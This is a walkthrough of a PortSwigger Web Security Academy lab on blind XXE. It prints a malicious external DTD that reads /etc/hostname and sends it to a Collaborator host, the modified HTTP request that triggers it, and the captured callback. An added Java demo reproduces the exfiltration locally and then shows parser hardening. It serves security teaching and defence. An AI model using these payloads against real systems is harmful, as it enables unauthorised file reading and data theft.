PortSwigger Web Security Academy

Exploiting blind XXE to exfiltrate data using a malicious external DTD

Solution

Check stock for productId=1 and capture the request in Burp. The body is XML parsed server-side, which makes this endpoint a candidate for XXE:

POST /product/stock HTTP/2
Host: 0a73007603e3c7f38077e08500540056.web-security-academy.net
Cookie: session=SVlwrRuhahyQem3mgw4LBnSKVYa0raNl
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a73007603e3c7f38077e08500540056.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a73007603e3c7f38077e08500540056.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Prepare payload

Open the exploit server and prepare the payload (first generate a fresh Collaborator payload; that is the subdomain the file contents will be sent to). The XXE is blind: the stock-check response never reflects entity contents, and the XML spec forbids referencing a parameter entity inside a markup declaration in the internal subset, so the nested declaration that builds the exfiltration URL has to live in an external DTD hosted on the exploit server.
Collaborator subdomain: s92l53du6gvlrfzg1czqbpkvimodca0z.oastify.com
---
https://exploit-0aa200a0037fc72080e6dfd401f50064.exploit-server.net/exploit

Payload (the body served at /exploit)

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://s92l53du6gvlrfzg1czqbpkvimodca0z.oastify.com/?x=%file;'>">
%eval;
%exfil;

How it works: the value of eval contains &#x25; instead of a literal %, so the nested exfil declaration is only formed once %eval; is processed; by then %file; has been expanded into the URL, and %exfil; makes the parser fetch that URL, carrying the file contents to Collaborator in the x parameter. /etc/hostname is a good first target because it is a single line: the contents travel inside a URL, so files with newlines or characters such as spaces, < or & generally break the request and need a different technique (for example error-based exfiltration).

Edit request

Add a DOCTYPE to the original stock-check request so the parser loads the external DTD from the exploit server (the body grows, so Content-Length changes too):

POST /product/stock HTTP/2
Host: 0a73007603e3c7f38077e08500540056.web-security-academy.net
Cookie: session=SVlwrRuhahyQem3mgw4LBnSKVYa0raNl
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a73007603e3c7f38077e08500540056.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 234
Origin: https://0a73007603e3c7f38077e08500540056.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aa200a0037fc72080e6dfd401f50064.exploit-server.net/exploit"> %xxe;]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Read the hostname from the Collaborator tab (click Poll now); the file contents arrive as the x query parameter, and the User-Agent shows the backend fetched it with Java's HTTP client:

Hostname: 803a85ba117c
---
GET /?x=803a85ba117c HTTP/1.1
User-Agent: Java/21.0.1
Host: s92l53du6gvlrfzg1czqbpkvimodca0z.oastify.com
Accept: */*
Connection: keep-alive
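
The callback's User-Agent says the target parses XML with Java, and a default JAXP DocumentBuilder behaves exactly as the lab does. The program below is an added end-to-end reproduction, not code from the writeup or the lab: one local HTTP listener stands in for both the exploit server (/exploit serves the DTD from the page) and Collaborator (/exfil records the callback), the page's DOCTYPE payload is parsed with the default parser so the file contents show up in the callback, and then the same document is fed to a hardened factory. The class name, the /exploit and /exfil paths, and the temporary file with constructed content that stands in for /etc/hostname (so it runs on any OS) are all assumptions of this example.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.ByteArrayInputStream;
import java.net.InetSocketAddress;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.TimeUnit;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXParseException;

public class BlindXxeDemo {
    public static void main(String[] args) throws Exception {
        // Constructed stand-in for /etc/hostname so the demo runs on any OS;
        // use "file:///etc/hostname" as fileUri to mirror the lab exactly.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.writeString(secret, "803a85ba117c");   // one line, no newline: the value has to fit in a URL
        String fileUri = secret.toUri().toString();

        // One local listener plays both the exploit server (/exploit) and Collaborator (/exfil).
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
        String base = "http://127.0.0.1:" + server.getAddress().getPort();
        CompletableFuture<String> exfil = new CompletableFuture<>();

        // The page's DTD with the Collaborator host swapped for the local listener.
        // &#x25; keeps the inner '%' inert until %eval; is processed; %file; is
        // expanded into the URL when this declaration is read from the external subset.
        String dtd = "<!ENTITY % file SYSTEM \"" + fileUri + "\">\n"
                   + "<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '" + base + "/exfil?x=%file;'>\">\n"
                   + "%eval;\n"
                   + "%exfil;\n";

        server.createContext("/exploit", ex -> {
            byte[] body = dtd.getBytes(StandardCharsets.UTF_8);
            ex.sendResponseHeaders(200, body.length);
            ex.getResponseBody().write(body);
            ex.close();
        });
        server.createContext("/exfil", ex -> {
            String q = ex.getRequestURI().getRawQuery();            // "x=<file contents>"
            exfil.complete(URLDecoder.decode(q.replaceFirst("^x=", ""), StandardCharsets.UTF_8));
            ex.sendResponseHeaders(200, -1);                         // empty body for the %exfil; entity
            ex.close();
        });
        server.start();

        // The stock-check body from the page, with the DOCTYPE pointing at the local /exploit.
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                   + "<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"" + base + "/exploit\"> %xxe;]>\n"
                   + "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>";

        try {
            // 1. Default JAXP factory: loads the external DTD, reads the file and sends it out.
            DocumentBuilderFactory vulnerable = DocumentBuilderFactory.newInstance();
            try {
                vulnerable.newDocumentBuilder().parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            } catch (Exception e) {
                // The lab target answers with a parse error as well; the file has already left by then.
            }
            System.out.println("default parser leaked: " + exfil.get(5, TimeUnit.SECONDS));

            // 2. Hardened factory: rejecting DOCTYPE means no DTD, no entities and no outbound fetch.
            DocumentBuilderFactory hardened = DocumentBuilderFactory.newInstance();
            hardened.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            hardened.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            hardened.setXIncludeAware(false);
            hardened.setExpandEntityReferences(false);
            try {
                hardened.newDocumentBuilder().parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            } catch (SAXParseException e) {
                System.out.println("hardened parser rejected the document: " + e.getMessage());
            }
        } finally {
            server.stop(0);
            Files.deleteIfExists(secret);
        }
    }
}
```

Compile and run with javac BlindXxeDemo.java && java BlindXxeDemo; the first line printed is the constructed file contents as received on /exfil, the second is the DOCTYPE-disallowed error from the hardened parser. Rejecting DOCTYPE outright is the fix that removes the whole bug class; if an application genuinely needs DTDs, the fallback is to set http://xml.org/sax/features/external-general-entities, http://xml.org/sax/features/external-parameter-entities and http://apache.org/xml/features/nonvalidating/load-external-dtd to false, which still blocks the external DTD fetch this technique depends on.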

Solved: submit the hostname in the lab's solution form.